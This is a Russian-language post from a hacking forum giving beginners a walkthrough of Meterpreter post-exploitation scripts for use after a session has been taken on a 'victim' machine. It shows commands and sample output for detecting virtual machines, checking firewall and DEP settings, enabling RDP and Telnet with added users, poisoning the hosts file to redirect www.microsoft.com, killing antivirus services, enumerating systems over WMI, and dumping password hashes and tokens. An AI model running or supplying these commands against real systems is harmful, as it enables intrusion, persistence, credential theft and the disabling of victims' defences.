Meterpreter для новичков

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 603
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Вот сейчас мы пройдемся с начала по Скриптам а потом и до Команд дойдем.

Metasploit поставляется с тоннами полезных скриптов и команд, которые могут помочь вам в исследованиях. Скрипты, как правило, сделаны третьими сторонами и в конечном итоге принимаются в хранилище Subversion. Мы будем рассматривать некоторые из них и описывать их назначения.

Скрипты и команды, указанные ниже, предназначены для использования с оболочкой Meterpreter после успешного получения сессии. После того, как вы получили сессию вы можете использовать эти скрипты и команды, чтобы наилучшим образом действовать в системе.

ССкрипты
1) checkvm

Скрипт под названием “checkvm” которое говорит само за себя предназначен для проверки наличия у цели виртуальных машин, не находится ли цель внутри виртуальной машины:

meterpreter > run checkvm

[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine

2) getcountermeasure

Скрипт ‘getcountermeasure’ проверяет установки безопасности на целевой системе и может отрубить (мало вероятно)

meterpreter > run getcountermeasure

Код:
[*] Running Getcountermeasure on the target...

 [*] Checking for contermeasures...

 [*] Getting Windows Built in Firewall configuration...

 [*]

 [*]     Domain profile configuration:

 [*]     --------------------------------------------------------------

 [*]     Operational mode                  = Disable

 [*]     Exception mode                    = Enable

 [*]

 [*]     Standard profile configuration:

 [*]     --------------------------------------------------------------

 [*]     Operational mode                  = Disable

 [*]     Exception mode                    = Enable

 [*]

 [*]     Local Area Connection 6 firewall configuration:

 [*]     --------------------------------------------------------------

 [*]     Operational mode                  = Disable

 [*]

 [*] Checking DEP Support Policy...
3) Getgui

‘getgui’ скрипт используется, чтобы включить RDP на целевой системе, если она отключена.

meterpreter > run getgui

Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p


OPTIONS:
Код:
 -e   Enable RDP only.

 -h   Help menu.

 -p   The Password of the user to add.

 -u   The Username of the user to add.

 

 meterpreter > run getgui -e
Код:
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator

 [*] Carlos Perez [email protected]

 [*] Enabling Remote Desktop

 [*] RDP is already enabled

 [*] Setting Terminal Services service startup mode

 [*] Terminal Services service is already set to auto

 [*] Opening port in local firewall if necessary
4) get_local_subnets

‘get_local_subnets’ скрипт используется, чтобы получить локальную маску подсети жертвы. Это может оказаться очень полезной информацией, чтобы иметь информацию для действий.

meterpreter > run get_local_subnets


Local subnet: 10.211.55.0/255.255.255.0

5) gettelnet

‘gettelnet’ скрипт используется, чтобы запустить TELNET на целевой машине, если это там отключено.

meterpreter > run gettelnet


Windows Telnet Server Enabler Meterpreter Script

Usage: gettelnet -u -p



OPTIONS:
Код:
 -e   Enable Telnet Server only.



 -h   Help menu.



 -p   The Password of the user to add.



 -u   The Username of the user to add.





 meterpreter > run gettelnet -e





 [*] Windows Telnet Server Enabler Meterpreter Script



 [*] Setting Telnet Server Services service startup mode



 [*] The Telnet Server Services service is not set to auto, changing it to auto ...



 [*] Opening port in local firewall if necessary
6) hostsedit

‘hostsedit’ скрипт Meterpreter для добавления записей в файл hosts Windows.

meterpreter > run hostsedit



OPTIONS:
Код:
 -e   Host entry in the format of IP,Hostname.



 -h   Help Options.



 -l   Text file with list of entries in the format of IP,Hostname. One per line.





 Example:





 run hostsedit -e 127.0.0.1,google.com



 run hostsedit -l /tmp/fakednsentries.txt





 meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com



 [*] Making Backup of the hosts file.



 [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back



 [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162



 [*] Clearing the DNS Cache
7) killav

‘killav’ скрипт может использоваться, чтобы отключить большинство антивирусных программ (Мало вероятно).

meterpreter > run killav

Код:
 [*] Killing Antivirus services on the target...



 [*] Killing off cmd.exe...
8) remotewinenum

‘remotewinenum’ скрипт перечислит информацию о системе через wmic на жертве

Я могу предположить, что
Код:
-u administrator -p ihazpassword -t 10.211.55.128



-u administrator Имя пользователя



-p ihazpassword Пароль пользователя



-t 10.211.55.128. Адресс в сети



meterpreter > run remotewinenum

Remote Windows Enumeration Meterpreter Script

This script will enumerate windows hosts in the target environment

given a username and password or using the credential under witch

Meterpreter is running using WMI wmic windows native tool.

Usage:


OPTIONS:
Код:
 -h   Help menu.



 -p   Password of user on target system



 -t   The target address



 -u   User on the target system (If not provided it will use credential of process)





 meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128





 [*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20090711.0142



 [*] Running WMIC Commands ....



 [*]     running command wimic environment list



 [*]     running command wimic share list



 [*]     running command wimic nicconfig list



 [*]     running command wimic computersystem list



 [*]     running command wimic useraccount list



 [*]     running command wimic group list



 [*]     running command wimic sysaccount list



 [*]     running command wimic volume list brief



 [*]     running command wimic logicaldisk get description,filesystem,name,size



 [*]     running command wimic netlogin get name,lastlogon,badpasswordcount



 [*]     running command wimic netclient list brief



 [*]     running command wimic netuse get name,username,connectiontype,localname



 [*]     running command wimic share get name,path



 [*]     running command wimic nteventlog get path,filename,writeable



 [*]     running command wimic service list brief



 [*]     running command wimic process list brief



 [*]     running command wimic startup list full



 [*]     running command wimic rdtoggle list



 [*]     running command wimic product get name,version



 [*]     running command wimic qfe list
10) winenum

Благодаря скрипту‘winenum’ Мы получаем хэш паролей, настройки системы, список пользователей и многое другое

meterpreter > run winenum
Код:
 [*] Running Windows Local Enumerion Meterpreter Script



 [*] New session on 10.211.55.128:4444...



 [*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt



 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........



 [*]     This is a VMware Workstation/Fusion Virtual Machine



 [*] Running Command List ...



 [*]     running command cmd.exe /c set



 [*]     running command arp -a



 [*]     running command ipconfig /all



 [*]     running command ipconfig /displaydns



 [*]     running command route print



 [*]     running command net view



 [*]     running command netstat -nao



 [*] Extracting software list from registry



 [*] Finished Extraction of software list from registry



 [*] Dumping password hashes...



 [*] Hashes Dumped



 [*] Getting Tokens...



 [*] All tokens have been processed



 [*] Done!
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя